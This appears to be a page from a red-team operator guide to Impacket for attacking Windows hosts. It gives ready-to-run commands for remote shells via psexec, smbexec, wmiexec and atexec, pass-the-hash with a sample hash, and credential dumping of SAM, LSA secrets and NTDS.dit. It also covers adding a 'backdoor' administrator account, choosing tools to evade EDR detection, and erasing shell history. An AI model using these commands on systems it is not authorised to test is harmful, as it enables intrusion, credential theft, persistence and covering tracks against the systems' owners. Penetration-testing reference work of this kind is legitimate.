Impacket
Overviewβ
Impacket is a Python library with standalone tools for interacting with Windows protocols β SMB, WMI, MSRPC, Kerberos, and more. All tools run from the Kali operator VM and authenticate against Windows targets using either plaintext credentials or NTLM hashes (pass-the-hash).
All Impacket tools are pre-installed on Kali Linux.
Authentication Formatsβ
All Impacket tools follow a common authentication syntax:
domain/username:password@<TARGET_IP>
domain/username@<TARGET_IP> # Prompts for password
domain/username:@<TARGET_IP> # Empty password
domain/username:<LM>:<NTLM>@<TARGET_IP> # Pass-the-hash
Pass-the-hash example: If you have captured NTLM hashes (e.g., from hashdump or Responder), you can authenticate without cracking:
impacket-psexec domain/Administrator:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c@<TARGET_IP>
# ^--- LM hash (can be blank/dummy) ^--- NT hash
For local accounts, use the hostname or . in place of domain:
impacket-psexec ./Administrator:Password123@<TARGET_IP>
impacket-psexec WORKGROUP/Administrator:Password123@<TARGET_IP>
impacket-psexecβ
Executes commands on a remote Windows host via SMB. Uploads a service binary to ADMIN$, creates a service, and returns a shell. Writes to disk and creates a service β highest artifact footprint.
# Interactive SYSTEM shell
impacket-psexec domain/username:password@<TARGET_IP>
# Run a single command
impacket-psexec domain/username:password@<TARGET_IP> cmd.exe /c "whoami /all"
# Pass-the-hash
impacket-psexec domain/Administrator:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c@<TARGET_IP>
psexec drops a binary to ADMIN$\SYSTEM32\ and registers a Windows service. This generates Security EID 7045 (service installed), creates file system artifacts, and is detected by most EDR products. Prefer smbexec or wmiexec where stealth matters.
impacket-smbexecβ
Executes commands via SMB by writing a batch file to a share and executing it via the Service Control Manager. Does not drop a service binary β lower artifact footprint than psexec.
# Interactive shell (SYSTEM context)
impacket-smbexec domain/username:password@<TARGET_IP>
# Pass-the-hash
impacket-smbexec domain/Administrator::<NT_HASH>@<TARGET_IP>
Output writes to a temporary file on the remote host (%SYSTEMROOT%\Temp\) β slightly noisier than wmiexec but avoids service binary drop.
impacket-wmiexecβ
Executes commands via WMI (TCP 135 + dynamic high port). Returns output through a temporary SMB share. Preferred method β no service creation, no binary drop.
# Interactive semi-shell (user context based on provided credentials)
impacket-wmiexec domain/username:password@<TARGET_IP>
# Single command execution
impacket-wmiexec domain/username:password@<TARGET_IP> "ipconfig /all"
# Pass-the-hash
impacket-wmiexec domain/Administrator::<NT_HASH>@<TARGET_IP>
# Execute as SYSTEM (requires SeImpersonatePrivilege β not always available)
impacket-wmiexec -nooutput domain/username:password@<TARGET_IP> "net localgroup administrators backdoor /add"
wmiexec generates fewer artifacts than psexec or smbexec. No service is created. Output is retrieved via a hidden share (ADMIN$) rather than a dropped file. Still generates WMI activity logs (EID 5861 if WMI subscriptions are audited) and network connections.
impacket-atexecβ
Executes a command on a remote host via the Windows Task Scheduler (AT service / Task Scheduler COM interface over SMB).
impacket-atexec domain/username:password@<TARGET_IP> "whoami > C:\Temp\out.txt"
Output is written to a file on the remote host β retrieve via smbclient. Useful when WMI is blocked but SMB + Task Scheduler is available.
impacket-smbclientβ
Interactive SMB client. Browse shares, upload/download files, execute limited operations.
# Connect to a specific share
impacket-smbclient domain/username:password@<TARGET_IP>
# Specify share at launch
impacket-smbclient domain/username:password@<TARGET_IP> -share C$
# Pass-the-hash
impacket-smbclient domain/Administrator::<NT_HASH>@<TARGET_IP>
Interactive Commandsβ
# Once connected:
shares # List available shares
use <SHARE_NAME> # Connect to share
ls # List directory contents
cd <PATH> # Change directory
get <FILENAME> # Download file
put <LOCAL_FILE> # Upload file
mkdir <DIR> # Create directory
rm <FILENAME> # Delete file
exit # Close connection
List Shares Non-Interactivelyβ
impacket-smbclient domain/username:password@<TARGET_IP> -list <TARGET_IP>
impacket-secretsdumpβ
Dumps credential material from a remote host β SAM database (local hashes), LSA secrets, cached domain credentials, and NTDS.dit (if run against a DC).
# Dump all secrets from a remote host
impacket-secretsdump domain/username:password@<TARGET_IP>
# Pass-the-hash
impacket-secretsdump domain/Administrator::<NT_HASH>@<TARGET_IP>
# Dump NTDS.dit from a Domain Controller (requires DA credentials)
impacket-secretsdump domain/Administrator:password@<DC_IP> -just-dc-ntlm
Output includes:
- Local SAM hashes:
username:RID:LM:NTLM::: - LSA secrets (service account credentials, cached machine account passwords)
- Domain cached credentials (DCC2 hashes β slow to crack)
secretsdump can also process previously dumped files:
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Tool Comparisonβ
| Tool | Transport | Artifacts | Context | When to Use |
|---|---|---|---|---|
psexec | SMB 445 | Binary drop + service | SYSTEM | Need SYSTEM; don't care about stealth |
smbexec | SMB 445 | Batch file in Temp | SYSTEM | SYSTEM shell, lower footprint than psexec |
wmiexec | WMI 135 + high | None (output via ADMIN$) | User | Preferred default β cleanest footprint |
atexec | SMB 445 | Scheduled task | SYSTEM | WMI unavailable; task scheduler accessible |
smbclient | SMB 445 | None | N/A | File browsing and transfer |
secretsdump | SMB 445 | VSS shadow copy (brief) | N/A | Credential harvesting |
OPSEC β Cleanupβ
# Clear bash history of Impacket commands (credentials visible in history)
history | grep impacket
history -d <LINE_NUMBER>
# Or suppress history for a command (prefix with space β requires HISTCONTROL=ignorespace)
impacket-psexec domain/user:password@<TARGET_IP>
All Impacket tool commands include credentials as command-line arguments. These are visible in:
- Shell history (
~/.bash_history,~/.zsh_history) - Process listing (
ps aux) during execution - System logs on the operator's host
Sanitize history after use. Consider using a wrapper script or environment variables to reduce plaintext credential exposure in the process table.